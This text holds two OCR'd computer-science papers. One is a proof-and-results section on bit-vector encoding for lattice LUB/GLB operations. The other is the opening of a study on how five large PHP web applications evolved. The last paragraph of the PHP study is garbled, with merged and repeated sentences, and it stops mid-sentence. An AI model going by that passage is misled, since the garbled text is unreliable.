Encode. In the next section we prove its correctness. 6 Correctness In this section we prove the correctness of our algorithm and show how the encoding leads to the reduction of LUB computation to an OR operation on the codes. Lemma 1 : If an impure node (indegree greater than one) receives a prefix in Pass 1 such that the $i^{th}$ bit becomes 1, then only its ancestors and descendants can have 1 at the $i^{th}$ position in their final codes. Proof: In Pass 1 the impure nodes are taken separately and assigned distinct prefixes (lines 20-24 in Figure 9). A node with indegree greater than one is the only node in the layer which has a 1 at the unique position. Hence only nodes related to it can get the 1 at that position. The ancestors get it in Pass 1 and the descendants in Pass 2. \[ \square \] **Lemma 2** : Consider two nodes \( a, b \), such that \( a.\text{layer.no} < b.\text{layer.no} \) but \( b \) is not an ancestor of \( a \). Let \( a' \) be an ancestor of \( a \) in \( b.\text{layer.no} \). Let \( a = a_1,a_2,..,a_n = a' \) be a path from \( a \) to \( a' \). Finally let all \( a_i \)'s and \( b \) have an indegree 1. If \( a' \) and \( b \) are non-sibling nodes then \( b.\text{code} \) does not subsume \( a.\text{code} \). Proof: The proof is by contradiction. Let us assume that \( b.\text{code} \) subsumes \( a.\text{code} \) i.e., \[ \forall i((2^i \& a.\text{code}) = 2^i \implies (2^i \& b.\text{code}) = 2^i) \] we will refer to this as the subsumption supposition. Let the LUB of nodes \( a' \) and \( b \) be node \( p \). Let \( a' =a_1',a_2',..,a_{n-1}',a_n' = p, \) be a path from \( a' \) to \( p \). Every \( a_i' \) has an indegree = 1. Further no \( a_i' \), except \( a_n' = p \), is ancestor of node \( b \). If it was then \( a_i' \) would be the LUB of \( a' \) and \( b \). Let \( b =b_1,b_2,..,b_n = p \) be a path from node \( b \) to node \( p \). Consider nodes \( a_{n-1}' \) and \( b_{n-1} \). They are children of \( p \), hence they are siblings. They were given distinct prefixes in Pass 1 by name.children (line 26-27), such that \( 2^i \& a_{n-1}' = 2^i \) (1 in the \( i \)-th bit position). Also \( 2^i \& b_{n-1} = 0 \). The prefixes of \( a_{n-1}' \) and \( b_{n-1} \) will be passed down to node \( a' \) and \( b \) respectively. The prefix of \( a' \) will be passed down to \( a \) during pass 2. Hence node \( a \) has 1 at a position where node \( b \) has a 0, contradicting the subsumption supposition. \[ \square \] We claim that (we will subsequently prove this) Algorithm Encode encodes in a way such that node \( a \) subsumes node \( b \) iff node \( a \) is an ancestor of node \( b \) (i.e., if there is a ‘1’ at \( i \)-th position in a node \( n \)'s code, then there is a ‘1’ at the \( i \)-th position of each of its ancestor’s code). Thus the OR operation on two codes yields a code that has 1’s in these identifying positions. All the nodes whose codes subsume this code are upper bounds of the two initial Algorithm Encode imposes a lexical ordering on related nodes according to layers (if \( a.\text{layer}.\text{no} < b.\text{layer}.\text{no} \) and \( a \) is related to \( b \) then \( a.\text{code} \prec b.\text{code} \), where \( \prec \) refers to lexical ordering with \( 0 \prec 1 \)). Hence the lexically least code of these upper bounds refers to the code of the LUB. **Lemma 3**: Algorithm Encode encodes the nodes such that if two nodes \( a \) and \( b \) are unrelated (i.e., they do not form an ancestor-descendant pair) then \[ \exists i \mid ((2^i \& a.\text{code}) = 2^i) \text{ and } ((2^i \& b.\text{code}) = 0) \] **Proof**: The proof is by contradiction. Let us assume without loss of generality that \( a.\text{layer}.\text{no} \leq b.\text{layer}.\text{no} \). So let us suppose that \( b.\text{code} \) subsumes \( a.\text{code} \), i.e., \[ \forall i((2^i \& a.\text{code}) = 2^i \implies (2^i \& b.\text{code}) = 2^i) \] as before we will refer to this as the subsumption supposition. Can indegree(a) > 1? If yes, then the prefix assigned to node \( a \) in Pass 1 was unique (line 21-24). No node which is unrelated to node \( a \) can have a 1 in that position. But we have supposed that there exists such a node namely node \( b \). This contradicts the subsumption supposition. Hence indegree(a)=1. Let \( a' \) be the ancestor of \( a \) in layer \( b.\text{layer}.\text{no} \). Let \( a = a_1, a_2, ..., a_n = a' \) be a path from \( a \) to \( a' \). All \( a_i's \) have indegree = 1, for the following reason. \( a_2 = \text{parent}(a) \) has indegree = 1. If it has indegree greater than 1 then it would have been given a unique prefix (i.e., 1 at say the \( i^{th} \) bit-position) in Pass 1. Node \( b \) is unrelated to node \( a \) so it is unrelated to parent(a) too. So node \( b \) can't have a 1 at the \( i^{th} \) bit-position. Node \( a \) gets 1 in the \( i^{th} \) position in Pass 2. This contradicts the subsumption supposition. Hence indegree(parent(a)) = 1. Proceeding similarly we have that all nodes along the path from node \( a \) to node \( a' \) have indegree = 1. Now consider 2 separate cases - indegree(b) > 1 and indegree(b)=1. Case 1 : indegree(b) > 1 In Pass 1 (lines 20-22 in Figure 9) node \( b \) was assigned a distinct prefix, such that the \( i^{th} \) bit became 1. \( a' \) was also assigned a prefix such that the \( j^{th} \) bit became 1. \( i \neq j \). \( b \) has a 0 at the \( j^{th} \) position. But \( a' \) has 1 at the \( j^{th} \) position and since \( a \) is related to \( a' \) in Pass 2 the prefix of \( a' \) will be passed down to $a$ thus $a$ has 1 at the $j^{th}$ position. (Note that all the nodes along the path from $a'$ to $a$ have indegree 1, so the prefix will not be gobbled up half-way through). This contradicts the subsumption supposition. Hence this case is proved. Case 2 : indegree($b$) = 1. 2.a) If $a'$ and $b$ are non-sibling nodes then by Lemma 2 this case is proved. 2.b) If $a'$ and $b$ are sibling nodes then $name\_children$ assigned them distinct codes in Pass1. $a'$ has 1 at the $i^{th}$ position where node $b$ has 0. Since $a$ is related to $a'$ in Pass 2 the prefix of $a'$ will be passed down to $a$, thus $a$ also has a 1 at position $i$. This is a contradiction to subsumption supposition. This case is proved. It is clear that the code of a node is subsumed by each of its ancestor's code. Combining this with Lemma 3 we can say that: **Theorem 1**: Algorithm Encode encodes in such a way that only a node's ancestors subsume its code. In this section we have proved the correctness of Algorithm Encode. We will now proceed to make a few additions to the above algorithm so that we can get the GLB as well. ### 6.1 GLB Computation In this section we will discuss procedure $glb\_info$ which can be called from Pass1 so that the same set of codes yield the GLB as well. Consider two nodes $a$ and $b$. If $a$.code subsumes $b$.code then by Theorem 1 $a$ is an ancestor of $b$, therefore node $b$ is the GLB of nodes $a$ and $b$. Similarly if $b$.code subsumes $a$.code then $a$ is the GLB. This checking takes $O(1)$ time. Now suppose that neither $a$ nor $b$ subsume the other then by Theorem 1 nodes $a$ and $b$ do not form an ancestor-descendant pair. Since we are dealing with a lattice the GLB of $a$ and $b$ definitely exists and now it must be an impure node. Thus the GLB must have been uniquely prefixed in Pass 1 (the minimal node is the only exception to this). Suppose the $i^{th}$ bit became 1 due to the unique prefixing. By Lemma 1 we can say that both $a$ and $b$ have 1 at the $i^{th}$ bit-position. Let $impure\_1s$ store the positions at which a 1 is introduced while encoding the impure nodes. Thus bit $i$ of $impure\_1s$ is 1 iff a 1 was introduced at /* node \textit{n} is an \textit{impure} node which introduces a 1 at bit position \textit{i} during Pass1. procedure \textit{glb.info} stores this information */ procedure \textit{glb.info}(n : node, \textit{i} : integer) begin global int: \textit{impure.ls} global array of nodes : \textit{glb[]} \textit{impure.ls} \leftarrow 2^i \ OR \ \textit{impure.ls} \textit{glb}[i] \leftarrow \textit{n} end procedure Figure 14: procedure \textit{glb.info} bit position \textit{i} while encoding an \textit{impure} node of the lattice. Moreover let \textit{glb} be an array which stores the \textit{impure} node names or indices, such that \textit{glb}[i] gives the \textit{impure} node whose encoding led to the introduction of 1 at the \textit{i}th bit-position. We perform these operations in \textit{procedure glb.info}. It is called from \textit{Pass1} when an \textit{impure} node is encountered (line 20 in Figure 9). Note that these operations do not increase the time complexity of Algorithm \textit{Encode} since \textit{procedure glb.info} takes $O(1)$ time. Finally to get the GLB of nodes \textit{a} and \textit{b} we first take the the bitwise AND of \textit{a.code}, \textit{b.code} and \textit{impure}, let this be \textit{c.code}. \textit{c.code} has 1's at those bit-positions at which 1's were introduced by their common \textit{impure} descendants and ancestors. A node at a higher layer introduces a 1 towards the left of the 1 introduced by a node at a lower layer. We now use \textit{left.most.1} to find out the bit position of the left most 1 in \textit{c.code}, let this be \textit{i}. Now \textit{glb}[i] yields the topmost common ancestor or descendant of \textit{a} and \textit{b}. We note that \textit{Algorithm Encode} imposes a lexical ordering on related nodes according to layers. So if \textit{a.code} $\prec$ \textit{i.code} or \textit{b.code} $\prec$ \textit{i.code} then we don't have the GLB because surely node \textit{i} resides at a layer higher than that of \textit{a} or \textit{b}. So we take the next leftmost bit-position in \textit{impure} and check again until \textit{a.code} $\prec$ \textit{i.code} and \textit{b.code} $\prec$ \textit{i.code}. If we fail to find such a node or if \textit{c.code} has 0's at all the bit positions then the minimal node is the GLB. This search takes $O(n_{impure})$ time, where \textit{n_{impure}} is the number of impure nodes in the lattice. Thus the GLB computation takes $O(n_{impure})$ time. We have already noted that in most cases in practice $n_{impure}$ is small thus GLB computation is very fast. Throughout the discussion we dealt with a lattice, so every pair of nodes had a distinct GLB and LUB. However this restriction can be relaxed. The algorithm works in exactly the same way on a structure in which a pair of nodes have more than one LUB or GLB. The proof of the algorithm for this structure proceeds along exactly the same lines. 7 Implementation The algorithm was implemented in C. It was tested on randomly generated posets - A tree was built with each node having a random degree and then edges were randomly added between unconnected nodes. The number of edges added were varied. As expected the code length was minimum when the number of new edges were less. In the Figure 15 the three curves corre- respond to different percentages, \( p \), of the total number of nodes with outdegree greater than one. Each curve represents the average number of bits required to encode a lattice with corresponding number of nodes at the specified percent of nodes with outdegree greater than one. It may be noted here that when the total number of nodes and number of nodes with outdegree greater than one were specified, the code length remained remarkably stable for the different lattices produced. Next we show the time required to compute the codes in Figure 16. The time of computation didn’t vary appreciably with the percentage of the nodes with outdegree greater than one, so only one curve has been drawn. It shows the computation time when 9 percent of the nodes had outdegree greater than one. 8 Conclusion We have presented a simple algorithm for encoding a tree for LUB computation. Then the algorithm was further evolved so that it could be applied to a lattice. This required dividing lattice into layers and finally making further changes in the algorithm itself to take care of the differences between a tree and a lattice. The main difference is that a lattice can have nodes with indegree greater than one, while a tree cannot. We proceeded to analyze and prove correctness of the algorithm formally and then present the experimental results. We noted that the same encoding also yielded the GLB by essentially applying the bitwise-and operation on the codes. Our schemes can be generalized to non-unique GLB's and LUB's. These techniques are can be applied for efficient computation of lattice operations, which are becoming more and more important in programming languages supporting object inheritance. 9 Acknowledgments Thanks are due to Patrick Lincoln for sending us a small poset and describing their method of poset generation. We owe special thanks to Chilikuri Mohan and V.S. Subrahmanian for thoroughly reading the paper and giving valuable suggestions. References can Conf. on Logic Programming, (eds. E. Lusk and R. Overbeek), MIT Press.
{"Source-Url": "http://surface.syr.edu/cgi/viewcontent.cgi?article=1091&context=eecs_techreports", "len_cl100k_base": 10629, "olmocr-version": "0.1.50", "pdf-total-pages": 30, "total-fallback-pages": 0, "total-input-tokens": 67307, "total-output-tokens": 12359, "length": "2e13", "weborganizer": {"__label__adult": 0.0005006790161132812, "__label__art_design": 0.0003561973571777344, "__label__crime_law": 0.0006093978881835938, "__label__education_jobs": 0.0007557868957519531, "__label__entertainment": 9.626150131225586e-05, "__label__fashion_beauty": 0.0002199411392211914, "__label__finance_business": 0.0002911090850830078, "__label__food_dining": 0.0006151199340820312, "__label__games": 0.0010061264038085938, "__label__hardware": 0.00145721435546875, "__label__health": 0.0011425018310546875, "__label__history": 0.00035190582275390625, "__label__home_hobbies": 0.0001614093780517578, "__label__industrial": 0.0007476806640625, "__label__literature": 0.00042891502380371094, "__label__politics": 0.0004274845123291016, "__label__religion": 0.0008478164672851562, "__label__science_tech": 0.0732421875, "__label__social_life": 0.00011724233627319336, "__label__software": 0.00467681884765625, "__label__software_dev": 0.91015625, "__label__sports_fitness": 0.0004730224609375, "__label__transportation": 0.0009622573852539062, "__label__travel": 0.0002493858337402344}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 40489, 0.03912]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 40489, 0.83355]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 40489, 0.87447]], "google_gemma-3-12b-it_contains_pii": [[0, 121, false], [121, 386, null], [386, 610, null], [610, 1386, null], [1386, 1909, null], [1909, 4491, null], [4491, 6577, null], [6577, 7406, null], [7406, 8734, null], [8734, 11380, null], [11380, 11409, null], [11409, 11438, null], [11438, 13830, null], [13830, 13859, null], [13859, 14628, null], [14628, 16378, null], [16378, 18083, null], [18083, 20686, null], [20686, 22371, null], [22371, 24046, null], [24046, 24764, null], [24764, 27053, null], [27053, 29609, null], [29609, 32231, null], [32231, 34425, null], [34425, 36938, null], [36938, 37747, null], [37747, 38542, null], [38542, 40289, null], [40289, 40489, null]], "google_gemma-3-12b-it_is_public_document": [[0, 121, true], [121, 386, null], [386, 610, null], [610, 1386, null], [1386, 1909, null], [1909, 4491, null], [4491, 6577, null], [6577, 7406, null], [7406, 8734, null], [8734, 11380, null], [11380, 11409, null], [11409, 11438, null], [11438, 13830, null], [13830, 13859, null], [13859, 14628, null], [14628, 16378, null], [16378, 18083, null], [18083, 20686, null], [20686, 22371, null], [22371, 24046, null], [24046, 24764, null], [24764, 27053, null], [27053, 29609, null], [29609, 32231, null], [32231, 34425, null], [34425, 36938, null], [36938, 37747, null], [37747, 38542, null], [38542, 40289, null], [40289, 40489, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 40489, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 40489, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 40489, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 40489, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 40489, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 40489, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 40489, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 40489, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 40489, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 40489, null]], "pdf_page_numbers": [[0, 121, 1], [121, 386, 2], [386, 610, 3], [610, 1386, 4], [1386, 1909, 5], [1909, 4491, 6], [4491, 6577, 7], [6577, 7406, 8], [7406, 8734, 9], [8734, 11380, 10], [11380, 11409, 11], [11409, 11438, 12], [11438, 13830, 13], [13830, 13859, 14], [13859, 14628, 15], [14628, 16378, 16], [16378, 18083, 17], [18083, 20686, 18], [20686, 22371, 19], [22371, 24046, 20], [24046, 24764, 21], [24764, 27053, 22], [27053, 29609, 23], [29609, 32231, 24], [32231, 34425, 25], [34425, 36938, 26], [36938, 37747, 27], [37747, 38542, 28], [38542, 40289, 29], [40289, 40489, 30]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 40489, 0.0]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
b58f374383da3eeadcae7afc59910793df87eb26
[REMOVED]
{"Source-Url": "https://pdfs.semanticscholar.org/479b/773d94d75a1f29af2eb02e72ed5213fa4c29.pdf", "len_cl100k_base": 12416, "olmocr-version": "0.1.50", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 59990, "total-output-tokens": 14041, "length": "2e13", "weborganizer": {"__label__adult": 0.0004897117614746094, "__label__art_design": 0.0006723403930664062, "__label__crime_law": 0.0004611015319824219, "__label__education_jobs": 0.0018281936645507812, "__label__entertainment": 0.0002067089080810547, "__label__fashion_beauty": 0.0002684593200683594, "__label__finance_business": 0.00041961669921875, "__label__food_dining": 0.0006475448608398438, "__label__games": 0.0012617111206054688, "__label__hardware": 0.0020580291748046875, "__label__health": 0.00115966796875, "__label__history": 0.0005269050598144531, "__label__home_hobbies": 0.0002046823501586914, "__label__industrial": 0.0009584426879882812, "__label__literature": 0.00121307373046875, "__label__politics": 0.0004856586456298828, "__label__religion": 0.0011072158813476562, "__label__science_tech": 0.34521484375, "__label__social_life": 0.00015819072723388672, "__label__software": 0.00878143310546875, "__label__software_dev": 0.63037109375, "__label__sports_fitness": 0.00033020973205566406, "__label__transportation": 0.0010385513305664062, "__label__travel": 0.00025010108947753906}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 39705, 0.02692]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 39705, 0.61202]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 39705, 0.79306]], "google_gemma-3-12b-it_contains_pii": [[0, 2981, false], [2981, 6975, null], [6975, 10814, null], [10814, 14223, null], [14223, 17593, null], [17593, 21004, null], [21004, 24076, null], [24076, 27576, null], [27576, 30288, null], [30288, 33089, null], [33089, 36267, null], [36267, 39705, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2981, true], [2981, 6975, null], [6975, 10814, null], [10814, 14223, null], [14223, 17593, null], [17593, 21004, null], [21004, 24076, null], [24076, 27576, null], [27576, 30288, null], [30288, 33089, null], [33089, 36267, null], [36267, 39705, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 39705, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 39705, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 39705, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 39705, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 39705, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 39705, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 39705, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 39705, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 39705, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 39705, null]], "pdf_page_numbers": [[0, 2981, 1], [2981, 6975, 2], [6975, 10814, 3], [10814, 14223, 4], [14223, 17593, 5], [17593, 21004, 6], [21004, 24076, 7], [24076, 27576, 8], [27576, 30288, 9], [30288, 33089, 10], [33089, 36267, 11], [36267, 39705, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 39705, 0.0]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
e7264af1592977f834eb9da5362f8014ce288ce1
Maintenance Patterns of large-scale PHP Web Applications Panos Kyriakakis School of Science and Technology Hellenic Open University Patras, Greece panos@salix.gr Alexander Chatzigeorgiou Department of Applied Informatics University of Macedonia Thessaloniki, Greece achat@uom.gr Abstract—Scripting languages such as PHP have been criticized as inadequate for supporting maintenance of large-scale software projects. In this paper we attempt to provide insight into the way that five large and well-known PHP applications evolved over time. Several aspects of their history are examined including the amount of unused code, the removal of functions, the use of libraries, the stability of their interfaces, the migration to object-orientation and the evolution of complexity. The results suggest that these systems undergo systematic maintenance which is driven by targeted design decisions and evolution is by no means hindered by the underlying programming language. Keywords—software evolution; web applications; survival analysis; software libraries; PHP; scripting language I. INTRODUCTION Various anecdotal sources in computer science claimed for long that despite the tremendous popularity of scripting languages [2], such as those employed in LAMP (Linux-Apache-MySQL – Perl/Python/PHP), are not suitable for proper and professional software engineering [10]. In other words, the proponents of traditional compiled languages such as Java and C++ claimed that software projects based on scripting languages lack the architectural properties that allow systematic, effortless and viable maintenance. Such attacks to the scripting languages are less frequently documented in scientific papers, although the academic community usually tends to reject the change in programming practices brought about by scripting [10]. This skepticism is also reflected by the fact that in most academic institutions around the world, computing curricula do not rely on scripting or dynamic languages for their CS101 course. The number of empirical studies in the software engineering community on projects built with typeless scripting languages is also significantly smaller than that of ‘system programming’ languages. On the other hand, evidence suggests that scripting languages enhance programmer productivity [12]. Prechelt [14] presented results according to which implementation times for programs written in scripting languages, such as Perl, Python, Rexx, and Tcl, were about one-half of the time required to implement the same functionality in C/C++/Java. The adoption of scripting languages by software practitioners is also reflected in the increased penetration to open-source development. In Sourceforge1 PHP's project count is in the third place after Java (52,234 projects) and C++ (42,081 projects) numbering 33,259 projects and overcoming C counting 31,194 projects. In this paper we present an empirical study on five large open-source web applications implemented with the popular scripting language PHP, to investigate the evolution of web applications regarding their maturity, quality and adoption of the object oriented paradigm. We have examined several aspects of software evolution that might provide hints as to whether good practices in development and management have been followed: The existence of dead/unused code in any software system is a burden consuming resources and posing threats to maintainability. We examine the presence and survivability of unused code as a means of detecting architectural changes in the history of the examined systems. In scripting languages a major source of unused code is the employment of third party libraries, which at the same time is an accepted good practice in software development and a possible indication of maturity [1], [2]. In this context, we investigated the amount of library code being used over time in each system. Another factor implying software maturity is the stability of the corresponding APIs, and therefore, we have also examined six classes of possible API changes. Moreover, we investigated the migration of the analyzed projects to the object oriented paradigm as well as the evolution of their complexity. The rest of the paper is organized as follows: In Section II we introduce the web applications that have been analyzed, while in Section III we discuss issues and challenges related to the analysis of the examined versions. Results on each of the investigated aspects of software evolution are presented and discussed in Section IV. Threats to validity are summarized in section V. Related work on similar efforts for analyzing software systems and previous work on scripting languages is presented in Section VI. Finally, we conclude in Section VII. II. APPLICATIONS The software systems used in the case study have been selected according to the following criteria: 1 http://sourceforge.net Open source projects implemented in PHP: 1. WordPress 2. Drupal 3. PhpBB 4. MantisBT 5. phpMyAdmin Our major concern was to select acknowledged projects with a long history, large number of committers and even larger number of users. According to Samoladas et al. [15] the majority of open-source projects are abandoned after a short time period, rendering them inappropriate for systematic analysis of programming and maintenance habits. The case study has been conducted on the following five open source projects implemented in PHP: 1. **WordPress**. The most popular blogging software; it has a vast community of both contributors and active users. 2. **Drupal**. One of the most advanced CMS (Content Management System). It is also characterized by a large and active community. 3. **PhpBB**. One of the most widely used forum software. 4. **MantisBT**. Probably the most popular bug tracking application written in PHP. 5. **phpMyAdmin**. The well-known MySQL administration tool. The abovementioned software systems are to a large extent community driven and could be characterized as the founding projects of web application development (considering the PHP as programming language). They have set the standards and powered most of the web content created in the last decade. The fact that the examined projects have an enormous code base and numerous user plug-ins dependent upon them, implies that backward compatibility should never be broken. Due to the projects long existence there are many versions available. In Table I we show some statistics about the selected projects. Cumulatively, we have studied 390 official releases aggregating to 50 years of software evolution. **TABLE I.** RELEASE STATISTICS FOR THE EXAMINED PROJECTS <table> <thead> <tr> <th>Project</th> <th>Years</th> <th>First Release</th> <th>Last Release</th> <th>Number of Releases</th> </tr> </thead> <tbody> <tr> <td>WordPress</td> <td>9</td> <td>1.5 2005</td> <td>3.6 2013</td> <td>71</td> </tr> <tr> <td>Drupal</td> <td>12</td> <td>4.0 2002</td> <td>7.23 2013</td> <td>120</td> </tr> <tr> <td>PhpBB</td> <td>12</td> <td>2.0 2002</td> <td>3.6 2013</td> <td>27</td> </tr> <tr> <td>MantisBT</td> <td>8</td> <td>1.0 2006</td> <td>1.25 2013</td> <td>33</td> </tr> <tr> <td>phpMyAdmin</td> <td>9</td> <td>2.0 2006</td> <td>4.1 2014</td> <td>129</td> </tr> </tbody> </table> In the next table we outline the growth of basic size measures. For the first and last release that has been examined, the size of the source code in KLOCs and the size in code blocks (number of functions and class methods) is shown. **TABLE II.** SIZE MEASURES FOR THE FIRST AND LAST RELEASE OF THE EXAMINED PROJECTS <table> <thead> <tr> <th>Project</th> <th>First Release</th> <th>Last Release</th> <th>Code Blocks</th> <th>Code Blocks</th> </tr> </thead> <tbody> <tr> <td>WordPress</td> <td>1.5 2005</td> <td>3.6 2013</td> <td>763</td> <td>5154</td> </tr> <tr> <td>Drupal</td> <td>4.0 2002</td> <td>7.23 2013</td> <td>692</td> <td>5140</td> </tr> <tr> <td>PhpBB</td> <td>2.0 2002</td> <td>3.6 2013</td> <td>256</td> <td>2389</td> </tr> <tr> <td>MantisBT</td> <td>1.0 2006</td> <td>1.25 2013</td> <td>2447</td> <td>4904</td> </tr> <tr> <td>phpMyAdmin</td> <td>2.0 2006</td> <td>4.1 2014</td> <td>693</td> <td>5543</td> </tr> </tbody> </table> The size growth reflected on the lines of code confirms Lehman’s 6th law of software evolution [8] which stipulates that programs grow over time to accommodate pressure for change and satisfy an increasing set of requirements. As proposed by Xie et al. [21] the number of definitions can provide an accurate indicator to study the size growth. Since in PHP the only clearly defined structures are functions and class methods, we measured their total number (designated as number of code blocks). Lehman’s 6th law is also vividly confirmed in this context. These systems have their roots back before PHP fully supported object orientation and this adds another point of interest because they combine procedural code and classes. The poor support of object orientation in PHP to versions prior to 5.3 lead to that coding style. Due to the mix of procedural and object programming we do not differentiate between functions and class methods in the applied survival analysis. ### III. THE APPROACH Each application has been analyzed with a software tool that we developed for conducting source code analysis and data collection in a uniform way (Section III.E). Available versions have been downloaded from Github and then static analysis of the source code has been performed to identify function and method signatures, class definitions and function usage data for each version. The extracted information has been stored to a database. Using the stored data we estimated the survival function regarding unused and removed functions. Moreover, we analyzed library usage and the degree of conformance to the object-oriented paradigm by measuring the ratio of class methods over the total number of functions/methods. Finally, we investigated the stability of function signatures as well as the evolution of complexity. Next we discuss some key points in our analysis. #### A. Challenges in the identification of unused code In the first part of this study we focus on unused functions and class methods i.e. functions which are not invoked by other system functions or methods (i.e. FanIn=0). We have deliberately avoided using the term 'dead code' as this usually includes non-reachable code blocks, whereas our analysis focuses only on functions which are not invoked. PHP is a highly dynamic language and functions might be called in various ways that static analysis as performed by currently available tools cannot identify. These cases include: - calls employing the Reflection API 2 http://wordpress.org/ 3 https://drupal.org/ 4 https://www.phpbb.com/ 5 http://www.mantisbt.org/ 6 http://www.phpmyadmin.net/ call_user_func() and call_user_func_array() calls • method invocations using the new operator with variable class names • Variable function names for static method calls such as $class::method() • variable function or method names such as $function() or $object->$method(). • Automatic calls to methods such as __toString() or Iterator::*(). For the cases where the function name is not a literal, it may even be retrieved from database data. Functions can also be invoked by extracting their name from the URL that users enter in their web browser. Especially in applications that employ the single front controller paradigm, which acts as the unique entry point for an entire application, a large number of controller actions might seem to be unused code. Thus, the identification of unused code poses significant challenges and can hardly be accurate. We refer to this type of calls as stealth calls, and since they cannot be detected by static analysis tools they are inevitably considered as unused code, posing a threat to the analysis. Another complication related to the aforementioned limitations is the widely used practice of hooks. Hooks refer to a functional implementation of the observer pattern that provides an extension mechanism to functions. The simplest implementation of a hook (Figure 1) is to have a global array holding the registered hooks, a function to make hook registrations (e.g. add_action) and finally a function to call the corresponding function handlers for a given hook (e.g. do_action). Thus, for a function that we want to extend, a call to do_action can be made, with parameter a key for the desired hook (e.g. 'my_hook'). That last call is made using PHP's call_user_func() function, whose first argument is a literal containing the desired function name. The use of hooks is clearly not traceable with general purpose static analysis tools. Many projects employ hooks not only as an extension point for third parties, but they also implement core functionality in this way. For example, a significant portion of the core functionality in WordPress takes advantage of the hooking system. Additionally, plug-ins implemented in the examined systems systematically take advantage of the hooking mechanism. The ideal solution to determine all actual function invocations is to examine the code manually, a process that is however infeasible even for medium sized applications. In our study we have used Bergmann's phpDCD12 tool to analyze the source code and extract unused code. To the best of our knowledge, phpDCD is one of the most reliable dead/unused code detectors for PHP, employing static analysis. However, the limitations that have been discussed are valid. --- 12 https://github.com/sebastianbergmann/phpdcd --- Figure 1 Simplest implementation of hooks B. Survival Analysis Survival analysis models the time it takes for events to occur and focuses on the distribution of the survival times. It has been applied in many fields ranging from estimation of time between failures for mechanical components, lifetime of light bulbs, duration of unemployment in economics, time until infection in health sciences and so on. In each context of application it is necessary to provide an unambiguous definition of the termination event. Survival can by modeled by employing an appropriate survival function. Non-parametric survival analysis does not assume any underlying distribution for survival times. The most common non-parametric analysis is Kaplan-Meier [6], 13 where the survival function, illustrated graphically by the corresponding Kaplan-Meier curve, refers to the probability of an arbitrary subject in a population to survive $t$ units of time from the time it has been introduced. Classical Kaplan-Meier analysis treats all subjects as if they existed in the beginning of the study and therefore does not allow the mapping of drops in the survival probability with particular time points (releases in our case). To enable a more detailed analysis of software evolution we also employ charts illustrating the survival function (rather than the cumulative probability to survive from time zero to $t$) as follows: Restricting observation to the discrete time points when termination events occur $t_1, t_2, \ldots, t_n$ we define $r_1, \ldots, r_n$ to be the number of subjects at risk and $d_1, d_2, \ldots, d_n$ to be the number of events at these time points. The probability of surviving from zero to $t_1$ is estimated by $S(t_1)=1-d_r/r_1$, where $d_r/r_1$ is the estimated proportion of subjects undergoing the termination event in that interval. The probability of surviving from $t_1$ to $t_2$ is given by $S(t_2)=1-d_r/r_2$. Thus, the survival function is equal to unity minus the hazard ratio $d_r/r_1$: $$S(t_r)=1-d_r/r_1$$ In contrast to most studies that employ survival analysis, where the initial population is not enhanced by new entries, in our case, we follow the approach by Pollock et al. [13] and Scaniello [16]. In particular, new code blocks added in each version are treated as ‘staggered’ entries [13] and are added to the existing population of functions which are “at risk”. C. Survival regarding function usage To apply the aforementioned survival analysis on the usage of functions, the termination event refers to the time point at which a function "becomes unused". A function or method (for the sake of simplicity we will refer to both as functions) becomes unused when there are no observable calls to that function. The assumption that has been used, similarly to Scaniello [16], is that once a function becomes unused in a version, it remains unused to the end of the observation. In order to calculate the survival function the following mapping is proposed. The discrete time points of observation \( t_i \) are the consecutive versions of the project under study. In each version, the functions and methods existing in that version are said to be at risk, and the number is denoted as \( r_i \), excluding those that were marked as terminated in previous versions. Finally, \( d_i \) indicates the number of functions and methods that become unused at version \( i \). Drupal and PhpMyAdmin contain a significant amount of unit tests indicating the effort that is made towards quality assurance; however, unit tests should not be counted as the unit tests indicating the effort that is made towards quality documentation in order to retrieve the subset of functions through source code analysis. Developers should consult the documentation in order to retrieve basic file information and elementary metrics. Then, it 